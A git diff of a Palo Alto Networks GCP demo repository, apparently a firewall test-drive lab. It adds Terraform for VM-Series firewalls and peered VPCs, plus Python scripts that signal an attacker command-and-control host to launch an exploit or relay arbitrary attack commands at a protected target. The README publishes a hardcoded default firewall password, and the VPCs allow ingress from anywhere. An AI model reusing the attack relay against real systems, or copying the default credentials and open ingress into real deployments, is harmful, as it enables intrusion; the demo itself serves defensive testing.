+gloud_login
+Runs the shell command to invoke login.
+The login process creates a new browser window for interactive login.
+The login process updates the gloud auth files in ~/.config/gcloud
+Files updated are:
+ access_tokens.db
+ config_sentinel
+ credentials.db
+
+The login process stores credentials in sqlite3 in ~/.config/gcloud/credentials.db
+
+https://www.jhanley.com/google-cloud-where-are-my-credentials-stored/
+
+"""
+
+def gcloud_login():
+ cmd = 'gcloud auth login'
+ os.system(cmd)
+
+if __name__ == '__main__':
+ gcloud_login()
diff --git a/gcp/Jenkins_proj-master/launch_attack_vector.py b/gcp/Jenkins_proj-master/launch_attack_vector.py
new file mode 100644
index 00000000..dce17b39
--- /dev/null
+++ b/gcp/Jenkins_proj-master/launch_attack_vector.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+ tf = Terraform(working_dir='./WebInDeploy')
+ rc, out, err = tf.cmd('output', '-json')
+
+ if rc == 0:
+ try:
+ return json.loads(out)
+ except ValueError as ve:
+ print('Could not parse terraform outputs!')
+ return dict()
+
+
+def main(attack_vector: str) -> None:
+
+ print('Attempting to launch exploit...\n')
+ outputs = get_terraform_outputs()
+ print(outputs)
+ if attack_vector == 'native':
+ print('Using native waf protected attack vector...\n')
+ target = outputs['NATIVE-DNS']['value']
+ elif attack_vector == 'panos':
+ print('Using PAN-OS protected attack vector...\n')
+ target = outputs['ALB-DNS']['value']
+ else:
+ print('malformed outputs!')
+ target = '127.0.0.1'
+ if 'ATTACKER_IP' not in outputs:
+ print('No attacker ip found in tf outputs!')
+ sys.exit(1)
+
+ attacker = outputs['ATTACKER_IP']['value']
+ payload = dict()
+ payload['attacker'] = attacker
+ payload['target'] = target
+
+ headers = dict()
+ headers['Content-Type'] = 'application/json'
+ headers['Accept'] = '*/*'
+
+ try:
+ resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers)
+ if resp.status_code == 200:
+ print('Exploit Successfully Launched!\n')
+ print(resp.text)
+ sys.exit(0)
+ else:
+ print('Could not Launch Exploit!\n')
+ print(resp.text)
+ sys.exit(0)
+ except ConnectionRefusedError as cre:
+ print('Could not connect to attacker instance!')
+ sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC')
+ parser.add_argument('-c', '--vector', help='Attack Vector', required=True)
+
+ args = parser.parse_args()
+ vector = args.vector
+
+ main(vector)
+
diff --git a/gcp/Jenkins_proj-master/requirements.txt b/gcp/Jenkins_proj-master/requirements.txt
new file mode 100644
index 00000000..ad92f262
--- /dev/null
+++ b/gcp/Jenkins_proj-master/requirements.txt
@@ -0,0 +1,12 @@
+google-api-core==1.11.1
+google-auth==1.6.3
+google-cloud-core==1.0.1
+google-cloud-storage==1.16.1
+google-resumable-media==0.3.2
+googleapis-common-protos==1.6.0
+pan-python==0.14.0
+pandevice==0.11.0
+python-terraform==0.10.0
+requests==2.21.0
+urllib3==1.24.2
+xmltodict==0.12.0
diff --git a/gcp/Jenkins_proj-master/send_command.py b/gcp/Jenkins_proj-master/send_command.py
new file mode 100644
index 00000000..cbccbdfb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/send_command.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+ tf = Terraform(working_dir='./WebInDeploy')
+ rc, out, err = tf.cmd('output', '-json')
+
+ if rc == 0:
+ try:
+ return json.loads(out)
+ except ValueError as ve:
+ print('Could not parse terraform outputs!')
+ return dict()
+
+
+def main(cli: str) -> None:
+
+ print('Attempting to launch exploit...\n')
+ outputs = get_terraform_outputs()
+
+ attacker = outputs['ATTACKER_IP']['value']
+ payload = dict()
+ payload['cli'] = cli
+
+ headers = dict()
+ headers['Content-Type'] = 'application/json'
+ headers['Accept'] = '*/*'
+
+ try:
+ resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers)
+ if resp.status_code == 200:
+ print('Command Successfully Executed!\n')
+ print(resp.text)
+ sys.exit(0)
+ else:
+ print('Could not Execute Command!\n')
+ print(resp.text)
+ sys.exit(0)
+ except ConnectionRefusedError as cre:
+ print('Could not connect to attacker instance!')
+ sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Send Jenkins Attack Command')
+ parser.add_argument('-c', '--cli', help='Attack Command', required=True)
+ parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False)
+
+ args = parser.parse_args()
+ cli = args.cli
+ mcli = args.manual_cli
+
+ if mcli is not None and mcli != '':
+ main(mcli)
+ else:
+ main(cli)
+
diff --git a/gcp/adv-peering-with-lbnh/README.md b/gcp/adv-peering-with-lbnh/README.md
new file mode 100644
index 00000000..f2a711cb
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/README.md
@@ -0,0 +1,73 @@
+## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering and Load Balancer as Next Hop
+Terraform creates 4 VM-Series firewalls that secure ingress/egress/east-west traffic for 2 spoke VPCs. The spoke VPCs are connected (via VPC Peering and Load Balancer as Next Hop) to the VM-Series. After the build completes, several manual changes must be performed to enable transitive routing. The manual changes are required since they cannot be performed through Terraform, yet.
+
+### Overview
+* 8 x VPCs (ilb-mgmt,ilb-untust,ilb-trust,mgmt, untrust, trust, spoke1, & spoke2) with relevant peering connections
+* 4 x VM-Series (BYOL / Bundle1 / Bundle2)
+* 2 x Ubuntu VM in spoke1 VPC (install Apache during creation)
+* 1 x Ubuntu VM in spoke2 VPC
+* 1 x GCP Public Load Balancer (VM-Series as backend)
+* 1 x GCP Internal Load Balancer (spoke1 VM's as backend)
+* 1 x GCP Internal Load Balancer (VM-Series firewall 3 & 4 as backend)
+* 2 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness)
+
+
+
+
+
+
+### Prerequistes
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+ * **Username:** paloalto
+ * **Password:** Pal0Alt0@123
+
+### Deployment
+1. Download the **adv-peering-with-lbnh** repo to the machine running the build
+2. In an editor, open **variables.tf** and set values for the following variables
+
+| Variable | Description |
+| :------------- | :------------- |
+| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `main_project_auth_file` | Authentication key file for main_project |
+| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer |
+| `spoke1_project_auth_file`| Authentication key file for spoke1_project |
+| `spoke2_project` | Project ID for spoke2 VM & VPC |
+| `spoke2_project_auth_file` | Authentication key file for spoke2_project |
+| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) |
+| `vmseries_image` | Uncomment the VM-Series license you want to deploy |
+
+3. Download project authenication key files to the main directory of the terraform build.
+
+
+
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes**
+
+
+
+7. From Terraform output, go to `GLB-ADDRESS = http://` in a web browser. NOTE: IT MAY TAKE SEVERAL MINUTES FOR SPOKE1 VMs TO FULLY INSTALL APACHE & PHP SETUP.
+
+
+
+### Prerequistes
+1. Terraform
+2. Access to GCP Console
+
+After deployment, the firewalls' username and password are:
+ * **Username:** paloalto
+ * **Password:** Pal0Alt0@123
+
+### Deployment
+1. Download the **adv_peering_2fw_2spoke** repo to the machine running the build
+2. In an editor, open **variables.tf** and set values for the following variables
+
+| Variable | Description |
+| :------------- | :------------- |
+| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. |
+| `main_project_auth_file` | Authentication key file for main_project |
+| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer |
+| `spoke1_project_auth_file`| Authentication key file for spoke1_project |
+| `spoke2_project` | Project ID for spoke2 VM & VPC |
+| `spoke2_project_auth_file` | Authentication key file for spoke2_project |
+| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) |
+| `vmseries_image` | Uncomment the VM-Series license you want to deploy |
+
+3. Download project authenication key files to the main directory of the terraform build.
+
+
+
+
+4. Execute Terraform
+```
+$ terraform init
+$ terraform plan
+$ terraform apply
+```
+
+5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes**
+
+
+
+7. From Terraform output, go to `GLB-ADDRESS = http://` in a web browser. NOTE: IT MAY TAKE SEVERAL MINUTES FOR SPOKE1 VMs TO FULLY INSTALL APACHE & PHP SETUP.
+
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes
new file mode 100644
index 00000000..0519ecba
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
similarity index 84%
rename from gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml
rename to gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
index 5f91248d..cceeb051 100644
--- a/gcp/gcp-terraform-mclimans/demo_deployments/two_tier/bootstrap/bootstrap.xml
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/bootstrap.xml
@@ -136,32 +136,7 @@
no
- Allow-HTTPS
-
-
-
-
-
-
-
- no
-
-
-
-
- no
-
-
- yes
-
-
- no
-
- 1460
-
- no
-
- Allow-HTTPS
+ mgmt-profile
@@ -175,12 +150,10 @@
-
-
-
-
-
+ yes
+ yes
+ yes
@@ -341,11 +314,19 @@
+
+ no
+
+
+ no
+
+
+ no
+ ethernet1/1ethernet1/2
- ethernet1/3
@@ -357,7 +338,7 @@
- 10.5.1.1
+ 192.168.1.1None
@@ -370,41 +351,44 @@
ethernet1/1100.0.0.0/0
+
+
+
-
-
- 10.5.2.1
-
-
- None
-
+ noany2
+
+ 192.168.2.1
+
+
+ None
+ ethernet1/210
- 10.5.2.0/24
+ 10.10.1.0/24
-
+ noany2
- 10.5.3.1
+ 192.168.2.1None
- ethernet1/3
+ ethernet1/210
- 10.5.3.0/24
+ 10.10.2.0/24
@@ -421,11 +405,20 @@
-
+ download-and-install
-
+ 15
+
+
+
+
+ download-and-install
+ 30
+
+
+ US/Pacific
@@ -443,7 +436,7 @@
yesno
- no
+ yesno
@@ -461,18 +454,17 @@ DO NOT USE FOR PRODUCTION
FQDN
- c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1yesno
- no
+ yesno
- vm-series8.8.8.84.2.2.2
+ mgmt-interface-swap
@@ -489,20 +481,13 @@ DO NOT USE FOR PRODUCTION
-
+ ethernet1/2
-
-
-
- ethernet1/3
-
-
-
@@ -555,7 +540,7 @@ DO NOT USE FOR PRODUCTION
ping
- application-default
+ anyany
@@ -564,9 +549,9 @@ DO NOT USE FOR PRODUCTION
yesallow
-
+
- web-zone
+ trust-zoneuntrust-zone
@@ -588,6 +573,7 @@ DO NOT USE FOR PRODUCTION
service-http
+ service-httpsany
@@ -595,13 +581,10 @@ DO NOT USE FOR PRODUCTION
yesyesallow
- Required to access web-server over the VM-Series untrust interface's elastic/public IP address.
-
-
+
- db-zone
- web-zone
+ trust-zoneuntrust-zone
@@ -619,12 +602,10 @@ DO NOT USE FOR PRODUCTION
any
- pingssh
- service-tcp-221
- service-tcp-222
+ anyany
@@ -635,13 +616,12 @@ DO NOT USE FOR PRODUCTION
noIf required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222.
-
+
- untrust-zone
+ trust-zone
- db-zone
- web-zone
+ trust-zone
-
+
- db-zone
+ untrust-zone
- web-zone
+ trust-zone
- db-server
+ anyany
@@ -689,7 +668,7 @@ DO NOT USE FOR PRODUCTION
any
- mysql
+ anyapplication-default
@@ -700,23 +679,12 @@ DO NOT USE FOR PRODUCTION
yesyesallow
-
-
-
- Test Drive
-
-
-
-
-
- web-server
- 22
-
+
@@ -734,20 +702,22 @@ DO NOT USE FOR PRODUCTION
any
- 10.5.1.4
+ any
- service-tcp-221
+ service-httpipv4
+ no
+
+ spoke1-intlb
+ 80
+
+ ethernet1/1
-
-
- db-server
- 22
-
+
- ethernet1/3
+ ethernet1/2
@@ -761,17 +731,17 @@ DO NOT USE FOR PRODUCTION
any
- 10.5.1.4
+ any
- service-tcp-222
+ service-tcp-221ipv4
- no
+
+ spoke1-vm
+ 22
+
+ ethernet1/1
-
-
- web-server
- 80
-
+
@@ -789,13 +759,40 @@ DO NOT USE FOR PRODUCTION
any
- 10.5.1.4
+ any
- service-http
+ service-tcp-222
+ ipv4
+
+ spoke2-vm
+ 22
+
+ ethernet1/1
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ trust-zone
+
+
+ trust-zone
+
+
+
+ any
+
+ anyipv4
- no
-
+
@@ -807,7 +804,7 @@ DO NOT USE FOR PRODUCTION
untrust-zone
- any
+ trust-zone
diff --git a/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt
new file mode 100644
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_2fw_2spoke/guide.pdf b/gcp/adv_peering_2fw_2spoke/guide.pdf
new file mode 100644
index 00000000..227722c9
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/guide.pdf differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/diagram.png b/gcp/adv_peering_2fw_2spoke/images/diagram.png
new file mode 100644
index 00000000..8ba1308e
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/diagram.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/directory.png b/gcp/adv_peering_2fw_2spoke/images/directory.png
new file mode 100644
index 00000000..b45b470e
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/directory.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/peering.png b/gcp/adv_peering_2fw_2spoke/images/peering.png
new file mode 100644
index 00000000..057ac136
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/peering.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/routes.png b/gcp/adv_peering_2fw_2spoke/images/routes.png
new file mode 100644
index 00000000..d6fb5d4a
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/routes.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/images/web.png b/gcp/adv_peering_2fw_2spoke/images/web.png
new file mode 100644
index 00000000..ae0534d5
Binary files /dev/null and b/gcp/adv_peering_2fw_2spoke/images/web.png differ
diff --git a/gcp/adv_peering_2fw_2spoke/main.tf b/gcp/adv_peering_2fw_2spoke/main.tf
new file mode 100644
index 00000000..c0bf8e83
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/main.tf
@@ -0,0 +1,136 @@
+provider "google" {
+ credentials = "${var.main_project_authfile}"
+ project = "${var.main_project}"
+ region = "${var.region}"
+}
+
+#************************************************************************************
+# CREATE VPCS - MGMT, UNTRUST, TRUST
+#************************************************************************************
+module "vpc_mgmt" {
+ source = "./modules/create_vpc/"
+ vpc_name = "mgmt-vpc"
+ subnetworks = ["mgmt-subnet"]
+ ip_cidrs = ["192.168.0.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+}
+
+module "vpc_untrust" {
+ source = "./modules/create_vpc/"
+ vpc_name = "untrust-vpc"
+ subnetworks = ["untrust-subnet"]
+ ip_cidrs = ["192.168.1.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+ source = "./modules/create_vpc/"
+ vpc_name = "trust-vpc"
+ subnetworks = ["trust-subnet"]
+ ip_cidrs = ["192.168.2.0/24"]
+ regions = ["${var.region}"]
+ ingress_allow_all = true
+ ingress_sources = ["0.0.0.0/0"]
+}
+
+#************************************************************************************
+# CREATE GCP BUCKET FOR VMSERIES BOOTSTRAP
+#************************************************************************************
+module "bootstrap" {
+ source = "./modules/create_bootstrap_bucket/"
+ bucket_name = "vmseries-adv-peering"
+ randomize_bucket_name = true
+ file_location = "bootstrap_files/"
+
+ config = ["init-cfg.txt", "bootstrap.xml"] // default []
+ license = ["authcodes"] // default []
+ # content = ["panupv2-all-contents-8133-5346", "panup-all-antivirus-2917-3427", "panupv2-all-wildfire-331212-333889"] // default []
+ # software = ["PanOS_vm-9.0.0"] // default []
+}
+#************************************************************************************
+# CREATE 2xVMSERIES FIREWALL W/ 3 NICS (MGMT VPC, UNTRUST VPC, TRUST VPC)
+#************************************************************************************
+module "vm_fw" {
+ source = "./modules/create_vmseries/"
+ fw_names = ["vmseries01", "vmseries02"]
+ fw_machine_type = "n1-standard-4"
+ fw_zones = ["${var.region}-a", "${var.region}-b"]
+ fw_subnetworks = ["${module.vpc_untrust.subnetwork_self_link[0]}", "${module.vpc_mgmt.subnetwork_self_link[0]}", "${module.vpc_trust.subnetwork_self_link[0]}"]
+
+ fw_nic0_ip = ["192.168.1.2", "192.168.1.3"] // default [""] - enables dynamically assigned IP
+ fw_nic1_ip = ["192.168.0.2", "192.168.0.3"]
+ fw_nic2_ip = ["192.168.2.2", "192.168.2.3"]
+
+ fw_bootstrap_bucket = "${module.bootstrap.bucket_name}"
+ fw_ssh_key = "admin:${var.vmseries_ssh_key}"
+ fw_image = "${var.vmseries_image}"
+
+ create_instance_group = true
+ instance_group_names = ["vmseries01-ig", "vmseries02-ig"] // default "vmseries-instance-group"
+
+ dependencies = [
+ "${module.bootstrap.completion}",
+ ]
+}
+
+#************************************************************************************
+# CREATE VMSERIES PUBLIC HTTP LOAD BALANCER
+#************************************************************************************
+module "vmseries_public_lb" {
+ source = "./modules/create_public_lb/"
+ name = "vmseries-lb"
+
+ backends = {
+ "0" = [
+ {
+ group = "${module.vm_fw.instance_group[0]}"
+ },
+ {
+ group = "${module.vm_fw.instance_group[1]}"
+ },
+ ]
+ }
+
+ backend_params = [
+ "/,http,80,10", // health check path, port name, port number, timeout seconds.
+ ]
+}
+
+#************************************************************************************
+# CREATE DEFAULT ROUTE TO WITHIN TRUST VPC TO FW1 & FW2
+#************************************************************************************
+resource "google_compute_route" "default" {
+ count = "${length(module.vm_fw.fw_names)}"
+ name = "default-to-${module.vm_fw.fw_names[count.index]}"
+ dest_range = "0.0.0.0/0"
+ network = "${module.vpc_trust.vpc_self_link}"
+ next_hop_instance = "${module.vm_fw.fw_self_link[count.index]}"
+ priority = 100
+}
+
+#************************************************************************************
+# CREATE PEERING LINKS TRUST-to-SPOKE1 / TRUST-to-SPOKE2
+#************************************************************************************
+resource "google_compute_network_peering" "trust_to_spoke1" {
+ name = "trust-to-spoke1"
+ network = "${module.vpc_trust.vpc_self_link}"
+ peer_network = "${module.vpc_spoke1.vpc_self_link}"
+}
+
+resource "google_compute_network_peering" "trust_to_spoke2" {
+ name = "trust-to-spoke2"
+ network = "${module.vpc_trust.vpc_self_link}"
+ peer_network = "${module.vpc_spoke2.vpc_self_link}"
+
+ provisioner "local-exec" {
+ command = "sleep 45"
+ }
+
+ depends_on = [
+ "google_compute_network_peering.trust_to_spoke1",
+ ]
+}
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf
new file mode 100644
index 00000000..bfe60b19
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_bootstrap_bucket/main.tf
@@ -0,0 +1,120 @@
+variable bucket_name {}
+
+variable file_location {}
+
+variable config {
+ type = "list"
+ default = []
+}
+
+variable content {
+ type = "list"
+ default = []
+}
+
+variable license {
+ type = "list"
+ default = []
+}
+
+variable software {
+ default = []
+}
+
+variable randomize_bucket_name {
+ default = false
+}
+
+locals {
+ bucket_name = "${var.randomize_bucket_name ? join("", list(var.bucket_name, random_string.randomstring.result)) : var.bucket_name}"
+}
+
+resource "random_string" "randomstring" {
+ count = "${var.randomize_bucket_name}"
+ length = 25
+ min_lower = 15
+ min_numeric = 10
+ special = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+ name = "${local.bucket_name}"
+ force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+ count = "${length(var.config) > 0 ? length(var.config) : "0" }"
+ name = "config/${element(var.config, count.index)}"
+ source = "${var.file_location}${element(var.config, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_full" {
+ count = "${length(var.content) > 0 ? length(var.content) : "0" }"
+ name = "content/${element(var.content, count.index)}"
+ source = "${var.file_location}${element(var.content, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_full" {
+ count = "${length(var.license) > 0 ? length(var.license) : "0" }"
+ name = "license/${element(var.license, count.index)}"
+ source = "${var.file_location}${element(var.license, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+resource "google_storage_bucket_object" "software_full" {
+ count = "${length(var.software) > 0 ? length(var.software) : "0" }"
+ name = "software/${element(var.software, count.index)}"
+ source = "${var.file_location}${element(var.software, count.index)}"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+resource "google_storage_bucket_object" "config_empty" {
+ count = "${length(var.config) == 0 ? 1 : 0 }"
+ name = "config/"
+ content = "config/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+ count = "${length(var.content) == 0 ? 1 : 0 }"
+ name = "content/"
+ content = "content/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+ count = "${length(var.license) == 0 ? 1 : 0 }"
+ name = "license/"
+ content = "license/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+ count = "${length(var.software) == 0 ? 1 : 0 }"
+ name = "software/"
+ content = "software/"
+ bucket = "${google_storage_bucket.bootstrap.name}"
+}
+
+
+resource "null_resource" "dependency_setter" {
+ depends_on = [
+ "google_storage_bucket.bootstrap",
+ "google_storage_bucket_object.config_full",
+ "google_storage_bucket_object.content_full",
+ "google_storage_bucket_object.license_full",
+ "google_storage_bucket_object.software_full",
+ "google_storage_bucket_object.config_empty",
+ "google_storage_bucket_object.content_empty",
+ "google_storage_bucket_object.license_empty",
+ "google_storage_bucket_object.software_empty",
+ ]
+}
+
+output "completion" {
+ value = "${null_resource.dependency_setter.id}"
+}
+
+output "bucket_name" {
+ value = "${google_storage_bucket.bootstrap.name}"
+}
diff --git a/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf
new file mode 100644
index 00000000..961faca1
--- /dev/null
+++ b/gcp/adv_peering_2fw_2spoke/modules/create_public_lb/main.tf
@@ -0,0 +1,168 @@
+
+variable project {
+ description = "The project to deploy to, if not set the default provider project is used."
+ default = ""
+}
+
+variable ip_version {
+ description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4"
+ default = ""
+}
+
+variable name {
+ description = "Name for the forwarding rule and prefix for supporting resources"
+}
+
+variable backends {
+ description = "Map backend indices to list of backend maps."
+ type = "map"
+}
+
+variable backend_params {
+ description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds"
+ type = "list"
+}
+
+variable backend_protocol {
+ description = "The protocol with which to talk to the backend service"
+ default = "HTTP"
+}
+
+variable create_url_map {
+ description = "Set to `false` if url_map variable is provided."
+ default = true
+}
+
+variable url_map {
+ description = "The url_map resource to use. Default is to send all traffic to first backend."
+ default = ""
+}
+
+variable http_forward {
+ description = "Set to `false` to disable HTTP port 80 forward"
+ default = true
+}
+
+variable ssl {
+ description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs"
+ default = false
+}
+
+variable private_key {
+ description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ default = ""
+}
+
+variable certificate {
+ description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty."
+ default = ""
+}
+
+variable use_ssl_certificates {
+ description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`"
+ default = false
+}
+
+variable ssl_certificates {
+ type = "list"
+ description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided."
+ default = []
+}
+
+variable security_policy {
+ description = "The resource URL for the security policy to associate with the backend service"
+ default = ""
+}
+
+variable cdn {
+ description = "Set to `true` to enable cdn on backend."
+ default = "false"
+}
+
+
+resource "google_compute_global_forwarding_rule" "http" {
+ project = "${var.project}"
+ count = "${var.http_forward ? 1 : 0}"
+ name = "${var.name}"
+ target = "${google_compute_target_http_proxy.default.self_link}"
+ ip_address = "${google_compute_global_address.default.address}"
+ port_range = "80"
+ depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_forwarding_rule" "https" {
+ project = "${var.project}"
+ count = "${var.ssl ? 1 : 0}"
+ name = "${var.name}-https"
+ target = "${google_compute_target_https_proxy.default.self_link}"
+ ip_address = "${google_compute_global_address.default.address}"
+ port_range = "443"
+ depends_on = ["google_compute_global_address.default"]
+}
+
+resource "google_compute_global_address" "default" {
+ project = "${var.project}"
+ name = "${var.name}-address"
+ ip_version = "${var.ip_version}"
+}
+
+# HTTP proxy when ssl is false
+resource "google_compute_target_http_proxy" "default" {
+ project = "${var.project}"
+ count = "${var.http_forward ? 1 : 0}"
+ name = "${var.name}-http-proxy"
+ url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+}
+
+# HTTPS proxy when ssl is true
+resource "google_compute_target_https_proxy" "default" {
+ project = "${var.project}"
+ count = "${var.ssl ? 1 : 0}"
+ name = "${var.name}-https-proxy"
+ url_map = "${element(compact(concat(list(var.url_map), google_compute_url_map.default.*.self_link)), 0)}"
+ ssl_certificates = ["${compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link))}"]
+}
+
+resource "google_compute_ssl_certificate" "default" {
+ project = "${var.project}"
+ count = "${(var.ssl && !var.use_ssl_certificates) ? 1 : 0}"
+ name_prefix = "${var.name}-certificate-"
+ private_key = "${var.private_key}"
+ certificate = "${var.certificate}"
+
+ lifecycle = {
+ create_before_destroy = true
+ }
+}
+
+resource "google_compute_url_map" "default" {
+ project = "${var.project}"
+ count = "${var.create_url_map ? 1 : 0}"
+ name = "${var.name}"
+ default_service = "${google_compute_backend_service.default.0.self_link}"
+}
+
+resource "google_compute_backend_service" "default" {
+ project = "${var.project}"
+ count = "${length(var.backend_params)}"
+ name = "${var.name}-backend-${count.index}"
+ port_name = "${element(split(",", element(var.backend_params, count.index)), 1)}"
+ protocol = "${var.backend_protocol}"
+ timeout_sec = "${element(split(",", element(var.backend_params, count.index)), 3)}"
+ backend = ["${var.backends["${count.index}"]}"]
+ health_checks = ["${element(google_compute_http_health_check.default.*.self_link, count.index)}"]
+ security_policy = "${var.security_policy}"
+ enable_cdn = "${var.cdn}"
+}
+
+resource "google_compute_http_health_check" "default" {
+ project = "${var.project}"
+ count = "${length(var.backend_params)}"
+ name = "${var.name}-check-${count.index}"
+ request_path = "${element(split(",", element(var.backend_params, count.index)), 0)}"
+ port = "${element(split(",", element(var.backend_params, count.index)), 2)}"
+}
+
+output "address" {
+ value = "${google_compute_global_address.default.address}"
+}
\ No newline at end of file
